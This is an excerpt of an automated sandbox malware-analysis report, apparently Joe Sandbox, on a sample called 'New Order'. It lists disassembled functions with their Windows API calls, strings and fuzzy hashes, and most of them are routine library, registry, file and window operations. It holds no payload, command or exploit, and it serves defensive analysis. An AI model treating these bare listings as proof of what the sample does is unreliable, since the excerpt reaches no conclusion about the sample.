Instruction Fuzzy Hash: F0418DB1A04314EFDB16CF54D884A9A7BA9FF44314F1584ADFD059F20AD7B1DA44CBA0

Function 00352F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00352F8D
LoadLibraryW.KERNEL32(?), ref: 00352F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00352FA9
DestroyWindow.USER32(?), ref: 00352FB1

Strings

SysAnimate32, xrefs: 00352F68

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 6ec86993223db157c24bf6c2d4d99a933e0acd62419cd3c7caa9d8dd73031436
Instruction ID: 8529b38452cc945ec53cfd3c27e617ee11db4607218938a26301c4549df62caa
Opcode Fuzzy Hash: 6ec86993223db157c24bf6c2d4d99a933e0acd62419cd3c7caa9d8dd73031436
Instruction Fuzzy Hash: EB21CA72204205AFEB124F64EC80EBB77BDEB5A32AF120218FD10E60A0C331DC559B60

Function 002E4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002E4D1E,002F28E9,?,002E4CBE,002F28E9,003888B8,0000000C,002E4E15,002F28E9,00000002), ref: 002E4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002E4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,002E4D1E,002F28E9,?,002E4CBE,002F28E9,003888B8,0000000C,002E4E15,002F28E9,00000002,00000000), ref: 002E4DC3

Strings

CorExitProcess, xrefs: 002E4D98
mscoree.dll, xrefs: 002E4D86

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0e78143fd4bf0cf4f7e35b4cef580d648fe59bf8f4dca9a046ea4253f2a1a41b
Instruction ID: 3c9ace50dbf9851627debde84e0ac1d140dda38dde97ff67b1580ce1f79d4cfc
Opcode Fuzzy Hash: 0e78143fd4bf0cf4f7e35b4cef580d648fe59bf8f4dca9a046ea4253f2a1a41b
Instruction Fuzzy Hash: C5F04F34A60309BFDB169F91DC49BEEBBB9EF44756F4040A4F905A2260CB709E50CB90

Function 002C4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,002C4EDD,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002C4EAE
FreeLibrary.KERNEL32(00000000,?,?,002C4EDD,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4EC0

Strings

kernel32.dll, xrefs: 002C4E94
Wow64DisableWow64FsRedirection, xrefs: 002C4EA8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 70b86ca46675ca5aa249eb3609d63ceaa48a123ed8cf9842309047b44913142a
Instruction ID: c8b507a3311756c0ed1b0ef5a14b07346500f28d4045bbf4a4e705dd6370c112
Opcode Fuzzy Hash: 70b86ca46675ca5aa249eb3609d63ceaa48a123ed8cf9842309047b44913142a
Instruction Fuzzy Hash: 66E08635A21F235F92232B256C28F5BA668AF81F67B060219FC01E2220DB60CE0181A0

Function 002C4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00303CDE,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002C4E74
FreeLibrary.KERNEL32(00000000,?,?,00303CDE,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 002C4E6E
kernel32.dll, xrefs: 002C4E5B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 89b3c2b52887ce8046f5003b4f477083881d420f40c9b228533f936493b23cd2
Instruction ID: c0bb7c2a42cf1f58332c862d174a19ed25b6b276e88a220487708653b2837b8e
Opcode Fuzzy Hash: 89b3c2b52887ce8046f5003b4f477083881d420f40c9b228533f936493b23cd2
Instruction Fuzzy Hash: F1D01235522B225B56232F297C28ECB6A2CAF85F5A7061619FD05A2125CF60CE11C5D0

Function 0034A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0034A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0034A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0034A468
CloseHandle.KERNEL32(?), ref: 0034A63D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: dc2b1f8fb59df3d22e1c7234ad42772ddf070bbabe914588cee11c2338a2b3d3
Instruction ID: 6a2252e8704ad00536a9fc6ea6d1843b0358b7d6077e6ee2f9de722ff2151f85
Opcode Fuzzy Hash: dc2b1f8fb59df3d22e1c7234ad42772ddf070bbabe914588cee11c2338a2b3d3
Instruction Fuzzy Hash: 1DA1CD716447009FD720DF24C886F2AB7E5AF84714F15895DF99A9B3E2D7B0EC018B82

Function 002FBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00363700), ref: 002FBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0039121C,000000FF,00000000,0000003F,00000000,?,?), ref: 002FBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00391270,000000FF,?,0000003F,00000000,?), ref: 002FBC36
_free.LIBCMT ref: 002FBB7F

Part of subcall function 002F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000), ref: 002F29DE
Part of subcall function 002F29C8: GetLastError.KERNEL32(00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000,00000000), ref: 002F29F0

_free.LIBCMT ref: 002FBD4B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: cec491312b9f312d5a9559fcaac193c27ac818666f82cf295e643cd74067c21c
Instruction ID: c3e346f47b6f28ef67987cfb3ab2197c6e18463115d018f60b4dc1796a9801c9
Opcode Fuzzy Hash: cec491312b9f312d5a9559fcaac193c27ac818666f82cf295e643cd74067c21c
Instruction Fuzzy Hash: F851D87191020EDFCB12EF65DC819BAF7BCAB41390F1046BBE654E7291DB709E518B50

Function 0032E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0032DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0032CF22,?), ref: 0032DDFD

Part of subcall function 0032DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0032CF22,?), ref: 0032DE16

Part of subcall function 0032E199: GetFileAttributesW.KERNEL32(?,0032CF95), ref: 0032E19A

lstrcmpiW.KERNEL32(?,?), ref: 0032E473
MoveFileW.KERNEL32(?,?), ref: 0032E4AC
_wcslen.LIBCMT ref: 0032E5EB
_wcslen.LIBCMT ref: 0032E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0032E650

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: d56d60467bb1df4bfcc2f92cf8787555d0a3debe4ee7cbf868c387a523df33ff
Instruction ID: a3f444091caef4b0d56b644272da0ebc613cb6f65ba8995ba67205c18a1fdd9d
Opcode Fuzzy Hash: d56d60467bb1df4bfcc2f92cf8787555d0a3debe4ee7cbf868c387a523df33ff
Instruction Fuzzy Hash: 735194B24083955BC725EB90DC81DDF73ECAF85340F40492EF689D3191EF74A6888B66

Function 0034B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Part of subcall function 0034C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0034B6AE,?,?), ref: 0034C9B5
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034C9F1
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034CA68
Part of subcall function 0034C998: _wcslen.LIBCMT ref: 0034CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0034BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0034BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0034BB63
RegCloseKey.ADVAPI32(?,?), ref: 0034BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0034BBB3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 8dee1dd1d8de0ea92b54fe9c37dd184c3061f8be33275443b935e712518a881d
Instruction ID: 3e607f6e1983234fcb26c268a0b34eb2c4aee7591485a2f2415bdad9b5a6e3d7
Opcode Fuzzy Hash: 8dee1dd1d8de0ea92b54fe9c37dd184c3061f8be33275443b935e712518a881d
Instruction Fuzzy Hash: DA619F31218241AFD715DF24C895E2ABBE9FF84308F54895CF4998B2A2DB31ED45CF92

Function 00328BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00328BCD
VariantClear.OLEAUT32 ref: 00328C3E
VariantClear.OLEAUT32 ref: 00328C9D
VariantClear.OLEAUT32(?), ref: 00328D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00328D3B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: ee23dd1f32da9c0cc624337879fd419b7ba0baae428baca5284880064630de2f
Instruction ID: 52d0cf96f79cf288897b28df4055c998299e003416592e1046c4f544012b0695
Opcode Fuzzy Hash: ee23dd1f32da9c0cc624337879fd419b7ba0baae428baca5284880064630de2f
Instruction Fuzzy Hash: 655169B5A01229EFDB11CF68D884AAAB7F8FF89314F158559E909DB350E730E911CF90

Function 00338AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00338BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00338BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00338C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00338C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00338C5F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 9b41313d3307f8b814160c45e4516c9f25881862864cb2ed87dfb944f33a1d6e
Instruction ID: 44acb8794288cbe70d06131c6f14a0d72fa68258e07d08b38a91956fa92d279a
Opcode Fuzzy Hash: 9b41313d3307f8b814160c45e4516c9f25881862864cb2ed87dfb944f33a1d6e
Instruction Fuzzy Hash: 2D512735A10215AFCB05DF64C881E6ABBF5FF48314F088459E84AAB362DB31ED51DF90

Function 00348EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00348F40
GetProcAddress.KERNEL32(00000000,?), ref: 00348FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00348FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00349032
FreeLibrary.KERNEL32(00000000), ref: 00349052

Part of subcall function 002DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00331043,?,761DE610), ref: 002DF6E6
Part of subcall function 002DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0031FA64,00000000,00000000,?,?,00331043,?,761DE610,?,0031FA64), ref: 002DF70D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 448f908cedaa246fb97209048d4c6ab3ff09223a3974f23349383f1792577591
Instruction ID: f2ac9f2ba7d97bbad154fa768c8dae52791963848de84fc1b78db4d3ba78a9f9
Opcode Fuzzy Hash: 448f908cedaa246fb97209048d4c6ab3ff09223a3974f23349383f1792577591
Instruction Fuzzy Hash: 005115356002059FCB12DF68C484DADBBF5FF49314B0581A9E80A9B762DB31ED85CF90

Function 00356B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00356C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00356C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00356C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0033AB79,00000000,00000000), ref: 00356C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00356CC7

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 57d46bd5cc73617faba4715951bbb8f626e76626751cc45308e170d224657ce6
Instruction ID: c38260fd9c8bdf52db937901d7dbe6cd58a6f8ec002d941ed0b4cc610cb359c3
Opcode Fuzzy Hash: 57d46bd5cc73617faba4715951bbb8f626e76626751cc45308e170d224657ce6
Instruction Fuzzy Hash: 7841F935604204AFD727CF68CC56FA9BBA9EB09365F960228FC95A72F0C371ED45CA40

Function 002F2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002F20C3
_free.LIBCMT ref: 002F20E3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f99b0136c25fac6adea4bfaa546b6defaac02fa47d2a505aaa19ca696b64a7e8
Instruction ID: bc74103d5ecafccca331b210dae958977a9e320e9d1624b818ccb26f9d3d287e
Opcode Fuzzy Hash: f99b0136c25fac6adea4bfaa546b6defaac02fa47d2a505aaa19ca696b64a7e8
Instruction Fuzzy Hash: C5410732A10204DFCB24DF78C980A6EF3A5EF86354F154179E605EB352DA31ED15CB90

Function 002D912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002D9141
ScreenToClient.USER32(00000000,?), ref: 002D915E
GetAsyncKeyState.USER32(00000001), ref: 002D9183
GetAsyncKeyState.USER32(00000002), ref: 002D919D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: a43048b70934aa039f0c8f4ec353c4f7c0264cc991c447ce89aabe47913bbe79
Instruction ID: 166608393573ba823bc44b52afd5e045415ef990eb854a567d5a73182e290a3e
Opcode Fuzzy Hash: a43048b70934aa039f0c8f4ec353c4f7c0264cc991c447ce89aabe47913bbe79
Instruction Fuzzy Hash: 5841713190860BFBDF1A9F64C844BEEB774FB09324F244226F429A62E0C770AD94CB51

Function 00333874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 003338CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00333922
TranslateMessage.USER32(?), ref: 0033394B
DispatchMessageW.USER32(?), ref: 00333955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00333966

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 0bcf8e78cb41f43f554d404f4cc21d1c390edb17fddb35ec6a3693c5716d27b6
Instruction ID: 35bd1735c0b08aeacd6c16c7256b5c525bbfbc833fda549aab902fa2f202d9d0
Opcode Fuzzy Hash: 0bcf8e78cb41f43f554d404f4cc21d1c390edb17fddb35ec6a3693c5716d27b6
Instruction Fuzzy Hash: 4931F270908342DEEB37CB35D8C9BB637ACEB06305F05846AE462D64A0E3B59A85CB11

Function 0033CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0033CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0033CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0033C21E,00000000), ref: 0033CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0033C21E,00000000), ref: 0033CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0033C21E,00000000), ref: 0033CFF2

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 2c087dcd96f267440766a0fb96522adbebb35674e407b8f6e84b7adb610c1d54
Instruction ID: df4305f98feb9bbeb7ea3fa418a08d3f29b1e870b2a8fcfd7551963afec86836
Opcode Fuzzy Hash: 2c087dcd96f267440766a0fb96522adbebb35674e407b8f6e84b7adb610c1d54
Instruction Fuzzy Hash: 82316971620305AFDB22DFA5C8C4AABBBFDEB04315F10542EF506E2611DB30AE41DB60

Function 00321901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00321915
